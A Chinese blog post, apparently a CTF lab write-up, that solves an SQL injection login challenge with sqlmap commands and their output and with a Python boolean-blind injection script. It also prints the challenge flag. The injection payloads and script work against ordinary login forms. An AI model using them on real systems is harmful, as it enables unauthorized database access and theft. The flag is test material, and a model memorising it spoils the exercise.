大家好!
我是小黄,很高兴又跟大家见面啦 !
拒绝水文,从我做起 !!!!
未经允许,禁止转载 ,违者必究!!!!
本实验仅适用于学习和测试 ,严禁违法操作 ! ! !
今天更新的是:
- 小白教程《从0到1:CTFer成长之路》SQL - 2 解题过程
- 《从0到1:CTFer成长之路》书籍配套题目,点击即可打开 - 实验环境(i 春秋 需要登录)
- 微信公众号回复:【
CTF】,即可获取本文全部涉及到的工具。
创建时间:2021年5月30日
软件: MindMaster Pro、kali
这里写目录标题
- CTF中的SQL注入
- 第四题 SQL - 2
- 第一种解法:利用SQLmap工具
- 第二种解法:利用Python脚本跑
CTF中的SQL注入
第四题 SQL - 2
- 一开始我以为这题环境进不去,后来才发现应该进的是login.php。
- 习惯性的查看源代码:发现: 如果觉得太难了,可以在url后加入?tips=1 开启mysql错误提示,使用burp发包就可以看到啦。
- 我直接认输,掏出我的BP 来测试一波
- 鼠标右键,复制保存文件,名称自定义,将文件格式改成
.txt方便我们后面利用 - 我将文件命名成
3333.txt下面将利用到。
第一种解法:利用SQLmap工具
- 根据题目环境,我们采用POST - 登录框注入方法。
- 为什么采用POST - 登录框注入方法呢? 相信很多小伙伴一定会有疑问了。
像这种是登录窗口的,URL中不是以
id=xxxx结尾的就可以采用这种方法进行尝试:
http:// www.xxx.com /Login.asp
http://eci-2zeaeeh8hdp3xetqte3p.cloudeci1.ichunqiu.com/login.php
- 将保存的
3333.txt,剪切到kali里面,在终端中打开。(这属于基操,就不演示了) - 让我们来尝试破解吧。
- 尝试找到注入点,指令: sqlmap -r 文件名.txt
sqlmap -r 3333.txt
- 爆破的得到的信息:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (POST)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: name=admin' AND 3237=3237 AND 'pPVI'='pPVI&pass=123456Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: name=admin' AND (SELECT 8314 FROM (SELECT(SLEEP(5)))Ffoa) AND 'eRQd'='eRQd&pass=123456
---
-
sqlmap爆当前数据库信息
-
尝试获取数据库信息,指令:
sqlmap -r 文件名.txt --current-db
sqlmap -r 3333.txt --current-db
- 爆破的得到的信息:
current database: 'note'
- 用sqlmap爆出库名:
note
- sqlmap.列出指定数据库所有的表名
- 尝试获取列出指定数据库所有的表名,指令:
sqlmap -r 文件名.txt -D note(指定数据库名) --tables
sqlmap -r 3333.txt -D note --tables
- 爆破的得到的信息:
Database: note
[2 tables]
+-------+
| fl4g |
| users |
+-------+
- 用sqlmap爆出表名:
fl4g,users
- sqlmap 列出指定表名的所有列名
- 尝试获取列出指定表名的所有列名,指令:
sqlmap -r 文件名.txt -D note(指定数据库名 )-T fl4g(指定的表名) --columns(全部表)
sqlmap -r 3333.txt -D note -T fl4g --columns
- 爆破的得到的信息:
Database: note
Table: fl4g
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| flag | varchar(40) |
+--------+-------------+
- 用sqlmap爆出列名:
flag
- sqlmap 打印输出表名指定列名字段的值数据
- 尝试打印输出表名指定列名字段的值数据,指令:
sqlmap -r 文件名.txt -D note(指定数据库名 )-T fl4g(指定的表名) -C flag(指定字段名) --dump (将结果导出)
sqlmap -r 3333.txt -D note -T fl4g -C flag --dump
- 爆破的得到的信息:
Database: note
Table: fl4g
[1 entry]
+----------------------------+
| flag |
+----------------------------+
| n1book{login_sqli_is_nice} |
+----------------------------+
- 终于拿到 flag:
n1book{login_sqli_is_nice}大功告成。
第二种解法:利用Python脚本跑
- 利用脚本进行布尔型注入
- 脚本内涉及的信息根据自己用bp截取的数据进行修改。
import requestsdef Get(url):result = ''for i in range(1, 100):left = 32right = 128mid = (left + right) // 2while left < right:# 查询表名# name = "admin' and if(ascii(mid((Select group_concat(table_name) from information_schema.tables " \# "where table_schema=database()),{0},1))>{1},1,0)#".format(i,mid)# 查询列名# name = "admin' and if(ascii(mid((Select group_concat(column_name) from information_schema.columns " \# "where table_schema=database() and table_name='fl4g'),{0},1))>{1},1,0)#".format(i,mid)# 根据表名和列名查询字段值name = "admin' and if(ascii(mid((Select flag from fl4g),{0},1))>{1},1,0)#".format(i, mid)data = {"name": name, "pass": "1223234"}res = requests.post(url, data)# 这里输入你的正确回显参数 :{"error":1,"msg":"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef"}if "\\u8d26\\u53f7\\u6216\\u5bc6\\u7801\\u9519\\u8bef" in res.content.decode():left = mid + 1else:right = midmid = (left + right) // 2# 查询结果结束if mid == 32:breakresult += chr(mid)print(result)print(result)# 这里你的输入URL:
Get('http://eci-2ze95405pp0e0j1nojmj.cloudeci1.ichunqiu.com/login.php')- 得到 flag:
n1book{login_sqli_is_nice}大功告成。
___
- SQLmap 工具注入参考资料:
- SQLmap 注入教程
- SQL map 注入教程
各位路过的朋友,如果觉得可以学到些什么的话,点个赞 再走吧,欢迎各位路过的大佬评论,指正错误,也欢迎有问题的小伙伴评论留言,私信。
每个小伙伴的关注都是本人更新博客的动力!!!
请微信搜索【 在下小黄 】文章更新将在第一时间阅读 !
博客中若有不恰当的地方,请您一定要告诉我。前路崎岖,望我们可以互相帮助,并肩前行!
